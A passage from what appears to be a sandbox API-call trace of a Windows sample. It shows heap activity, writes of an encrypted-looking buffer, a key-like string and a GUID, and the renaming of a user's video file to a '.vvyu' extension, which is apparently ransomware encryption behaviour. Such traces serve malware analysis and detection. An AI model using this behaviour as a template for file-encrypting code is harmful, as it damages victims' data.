Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.557] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x132c0) returned 0x2ea79b0 [0195.557] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1458 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea14a0 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.558] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0195.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cf0 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2cd8 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.562] GetCurrentThreadId () returned 0x66c [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea08e0 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.563] GetCurrentThreadId () returned 0x66c [0195.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cf0 [0195.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d50 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d68 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d08 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cd8 [0195.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0195.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea14a0 | out: hHeap=0x620000) returned 1 [0195.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.574] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x132b0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x132b0, lpOverlapped=0x0) returned 1 [0195.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.575] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x132b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.575] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.576] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.577] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.577] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.577] CloseHandle (hObject=0x568) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea4a68 [0195.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.579] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\SipikwOFNhn.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\sipikwofnhn.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\SipikwOFNhn.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\sipikwofnhn.swf.vvyu")) returned 1 [0195.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.581] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.584] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z2E0zT", cAlternateFileName="")) returned 1 [0195.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0195.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0195.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0195.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0195.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.585] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z2E0zT", cAlternateFileName="")) returned 0 [0195.585] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0195.585] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ba0 | out: hHeap=0x620000) returned 1 [0195.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0195.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94b58 | out: hHeap=0x620000) returned 1 [0195.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94b10 | out: hHeap=0x620000) returned 1 [0195.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ac8 | out: hHeap=0x620000) returned 1 [0195.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94e28 | out: hHeap=0x620000) returned 1 [0195.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94e70 | out: hHeap=0x620000) returned 1 [0195.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94eb8 | out: hHeap=0x620000) returned 1 [0195.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94f00 | out: hHeap=0x620000) returned 1 [0195.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94f48 | out: hHeap=0x620000) returned 1 [0195.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94f90 | out: hHeap=0x620000) returned 1 [0195.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94fd8 | out: hHeap=0x620000) returned 1 [0195.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95020 | out: hHeap=0x620000) returned 1 [0195.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95068 | out: hHeap=0x620000) returned 1 [0195.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e950b0 | out: hHeap=0x620000) returned 1 [0195.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e950f8 | out: hHeap=0x620000) returned 1 [0195.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95140 | out: hHeap=0x620000) returned 1 [0195.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0195.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0195.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0195.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0195.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0195.593] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.594] HeapFree 